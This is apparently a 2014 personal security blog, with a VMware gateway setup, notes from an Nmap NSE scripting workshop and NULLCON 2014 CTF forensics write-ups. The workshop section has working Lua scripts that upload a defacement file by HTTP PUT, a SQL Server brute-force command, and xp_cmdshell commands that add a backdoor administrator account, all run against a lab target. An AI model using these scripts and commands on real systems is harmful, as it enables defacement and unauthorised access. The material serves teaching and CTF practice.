Start to learn hacking !

Friday, March 28, 2014

Vmware Player-Guest as internet gateway

Recently one of my friend asked me about setting up a Internet gateway on Virtual Guest system and configure that for other virtual machines and Host to connect internet.

The following steps used to test this successfully.

Details of the setup

Systms used all are Linux.

ppp0 -> Internet connection using USB dongle.
Eth0 -> Interface used by default with vmware player.

IP Details
ppp0 -> DHCP by ISP.
eth0 -> 192.168.2.140/24


The following lines can be saved in /etc/rc.local   permanently.

echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A FORWARD -i eth0 -j ACCEPT
iptables -t nat -A POSTROUTING -o ppp0 -j MASQUERADE

All done. This machine become Linux router.

Setup for other virtual guest.
Command line
ifconfig eth0 192.168.2.130/24
route add default gw 192.168.2.140


GUI


On HOST System

Add route
sudo route add default gw 192.168.2.140 vmnet8
add DNS server IP inside /etc/resolv.conf
nameserver 8.8.8.8

IP is already there on vmnet0.

After setting up route. The gateway guest system may loose IP address. Just set the ip address with following command
ifconfig eth0 192.168.2.140/24








Sunday, February 2, 2014

NULL-HUMLA-NMAP-NSE-NetworkPentesting

This is about the NULL Humla happened about NMAP NSE Scripting - by Sudhir Babu & Rupam Bhattacharya at Bangalore Center for Internet and Society.

Agenda:

1. Getting familiar with usage of nmap scripting
2. Go inside and see the script source and understand fundamental structure 
3. Write your own script and execute the same with nmap against target machine
4. Getting a shell on target using default scripts on a vulnerable system.

Pre-requisite : Two Systems 
                      1. Any system running with latest version of nmap
                      2. Target vulnerable system  (Windows XP with SQL Server was provided)

Getting familiar with NMAP
http://www.nmap.org 

Location of script files on Linux system




How to run scripts 

#nmap -p80 -PN -n 192.168.2.128 --script=http-date

The following description is available in the description part of script

"This script will scan port 80 and if its open it will check the date. Gets the date from HTTP-like services. Also prints how much the date differs from local time. Local time is the time the HTTP request was sent, so the difference includes at least the duration of one RTT."

Script Structure 

The following is a script to retrieve the day and time from the day-time server 

local comm = require "comm"
local shortport = require "shortport"

description = [[
Retrieves the day and time from the Daytime service.
]]

---
-- @output
-- PORT   STATE SERVICE
-- 13/tcp open  daytime
-- |_daytime: Wed Mar 31 14:48:58 MDT 2010

author = "Diman Todorov"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"discovery", "safe"}


portrule = shortport.port_or_service(13, "daytime", {"tcp", "udp"})

action = function(host, port)
        local status, result = comm.exchange(host, port, "dummy", {lines=1, proto=port.protocol})

        if status then
                return result
        end
end

Elaborated details are already available here -> http://nmap.org/book/nse-script-format.html

Following script will get list of http methods enabled on a web server

local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local string = require "table"

description = [[
Retrieves the methods enabled on a HTTP Server.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

portrule = shortport.http
action = function(host, port)
response = http.generic_request(host,port,"OPTIONS","/")
return response
end

In this the description, author and licence sections are optional in case of personal use.

This will open connection to the port of web server and send OPTIONS and get the response and return the response to the NMAP engine. NMAP engine will display the result as shown below. We can see NMAP showing the script name and below the output. It allows GET HEAD POST and OPTIONS



Another example against a web server allows other dangerous OPTIONS like DELETE, PUT,MOVE, etc.



How to put a file to the web server using NSE Script.

Method one using PUT. 

local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local string = require "table"

description = [[
Retrieves the methods enabled on a HTTP Server.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

portrule = shortport.http
action = function(host, port)
response = http.put(host,port,"/deface.txt",nil,"defacingweb")
return response
end


TO DELETE an uploaded file
local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local string = require "table"

description = [[
Retrieves the methods enabled on a HTTP Server.
]]

author = "NullHumla-Feb-1-2014"

license = "Same as Nmap--See http://nmap.org/book/man-legal.html"

categories = {"default"}

portrule = shortport.http
action = function(host, port)
response = http.generic_request(host,port,"DELETE","/deface.txt",nil)
return response
end

SOCKET

Create a file using NSE Socket

local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local string = require "table"

categories = {"default"}

portrule = shortport.http

local socket = nmap.new_socket()

action = function(host,port)
        socket:connect(host,port)
        socket:send("PUT /deface.txt HTTP/1.1 \r\nHost: 192.168.0.5\r\nContent-length: 6\r\n\r\ndeface")
        response=socket:receive()
        return response
end


Other default NSE script example

SQL username/password brute-forcing
 #nmap -p 1433 --script ms-sql-brute --script-args userdb=username.txt ,passdb=password.txt 192.168.0.5

SQL CMD SHELL add a user
 nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="net user admin1 admin1-password /add" 192.168.0.5

Add the user to Administrators group(net localgroup administrators <username> /add)

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="net localgroup administrators admin1 /add" 192.168.0.5

Run other commands example "ipconfig"
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=passw0rd,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.0.5



Thanks to NULL++ Sudhir Babu ++ Rupam Bhattacharya & Riyaz Walikar ++ Akash Mahajan


Monday, January 27, 2014

NULLCON2014-CTF-Misc-Levels

Misc Level 1


There is a pcap file given and we need to find out a store name!


So loaded the pcap in wireshark and tried to view the objects in the communication traffic using HTTP Object viewer.
It was showing an image named nullCTF.png
Saved that image and started reading about meta data and EXIF.
http://en.wikipedia.org/wiki/Exchangeable_image_file_format
The EXIF data extraction searches in google resulted the best site for the same.


The following information -

So this is showing what ever information we are expecting ... !!
Clicked on the google maps link



After enlarging  the map "A" is near by 
So its near a Bank :) That is the flag.

Misc Level 2
In Level 2 SWF file is provided and we are supposed to find out an email address.. !
Tried to convert SWF to XML using SWFMILL.EXE
It thrown parsing error !
What next ?  Looks like Alphabets converted in to hex !
%68%74%74%70%3a%2f%2f%62%69%74%2e%6c%79%2f%31%61%4c%49%59%76%57
Hex values
68 74 74 70 3a 2f 2f 62 69 74 2e 6c 79 2f 31 61 4c 49 59 76 57


Converted with online converter -> http://www.branah.com/ascii-converter
In search of an Email address we got a tinyURL !!
Another APKFile to download !
Extracted the APK and done a grep on classes ..  So there comes one Email Address .. :)


Misc Level 3
Let's listen to music ..


An mp3 file downloaded.. With last years experience used Audacity audio software
and played this file .. forward and reversed :)
nothing comes up
Checked the Left and Right !!
So there is some thing like Morse code  :)


Listened and wrote the Morse code and converted to corresponding alphabets..
That is the FLAG :)

NULLCON2014-CTF


This is just to brief my experience with Null Con CTF 2014 (http://ctf.nullcon.net)

There are multiple levels of knowledge required to crack CTF.

The following screenshot shows all main Level like Trivia, Web, RE,Crypto,etc.
And under each of them there are 3-6 Challenges.


By taking help from Google and multiple friends null community I was able to make 3900 points and ranked 23rd.

Main focus of this writing is on Forensics Challenges.

We have been instructed to download a 2Gb file from http://sourceforge.net/projects/nullconctf2014/?source=directory

The 2Gb rar file extracted and got dd image of hard disk with 10Gb.
To make it work with vmware player I used dd2vmdk (http://sourceforge.net/projects/dd2vmdk/) This tool will make DD image bootable.

Used the dd image on another Linux to understand the operating system in that and comes to know that it is Windows 7.
The command executed like
dd2vmdk -i syn_null2014ctf.dd.001 -v win7.vmdk

After this create a Windows 7 Guest on vmwareplayer with hard disk name win7.vmdk. While adding this  hard disk it may ask about keep current format or convert. I have selected keep existing format.

Vmware guest windows 7 booted so nicely without asking for password.

Now we have system up and running to work on challenges

Forensics Level 1

The Client complained that whenever he boots up the machine, all files in his document folder automatically gets deleted. Can you identify the culprit executable process doing this?


For answering this we should know how programs are automatically executing on windows persistently. To know that I have referred many web sites and the following found to be good. 
http://www.slideshare.net/boonlia/registry-forensics-10249175
http://www.bleepingcomputer.com/tutorials/windows-program-automatic-startup-locations/

After looking in to all location I found only one entry for autorun and that is
audiodg.exe
Looks innocent and genuine windows file..!!

There was no suspicious registry entries in common locations but  as per the first link presentation there are some important locations to look for like




When searching the "Image File Execution Options "


Here we can see a suspicious entry of "ntbackup.exe" 

Forensics Level 2


Forensics Level 2
There is a ZIP file names null password.zip on the desktop.
Task is to get the password.
We know without password we can view the file names like the following
I started searching for these files on the system in case if these files are present there before adding to zip then it is easy to open password.docx and get the flag. But unfortunately that file was not there but I got the PDF file.


After searching on google for some time came across a ZIP file attack type called Known Plain text Attack(KPA)
And got a wonderful explanation with practical steps on the following web site.


So the step for this level is
Make sure we have only ZIP file in one folder and run the following command from terminal.
1. extract "null password.zip" "Null final1.pdf"
2. Rename the extracted (no need to open it) Null final1C.pdf
3. ZIP the Null Final1.pdf file which we got from the system as PLAIN using the same rar utility available on the Windows 7 and create ZIP file without encryption (any name is fine). Lets say open.zip
4. again run extract on unencrypted ZIP
  extract open.zip "Null final1.pdf"
5. Rename this file as well like rename Null final1.pdf Null final1P.pdf
6.Verify: If you used an entire file for plain text and everything went according to plans, the stripped encrypted file (Null final1C.gif) should be exactly 12 bytes longer than the stripped plain text file (Null final1P.gif).

6. pkcrack -c "Null final1C.pdf" "Null final1P.pdf"
(pkcrack is available for 16/32 bit version of windows only)

7. pkcrack will give us KEY0 KEY1 KEY2 after successful

So the output we are interested is Key0,1,2
8. Now we should use the keys to decrypt the files from zip for that we have utility called zipdecrypt.exe
9. Now we have openzip.zip. Just unzip password.docx and get the flag.


Forensics Level 3
We have pcapng file on the desktop sized about 35Mb
This is about GPS /geo location finding.
No more writing on this - but used wireshark compiled with GeoIP plugin. This will give exact locations with maps. Amazing.. the flag is a road name not country name like china.
Forensics Level 4
There is an image names nullcon.jpg on the desktop.
stegdetect has told that the file have invisible secretes but it need a password.
There was a password hint that remove i ..
stegdetect -t i Nullcon.jpg
Nullcon.jpg : invisible[64](***)

After taking help. I have opened the file in GIMP and used a functionality called channels - while showing only red channel it was showing some image.. looks like Eiffel tower -- so if we remove i from Eiffel - possibly that is the password for opening the invisible text file embedded with flag.!!
The file was looking like following by default
After playing with channels the image was like following
We can see Eiffel tower in that image. If we see the image from a particular angle we can clearly see Eiffel Tower :) 
 



So we have a jpeg file with invisible secrets and password to open it. Now search of a tool... trial version of east-tec invisible secrets (http://www.east-tec.com/invisiblesecrets/reviews/)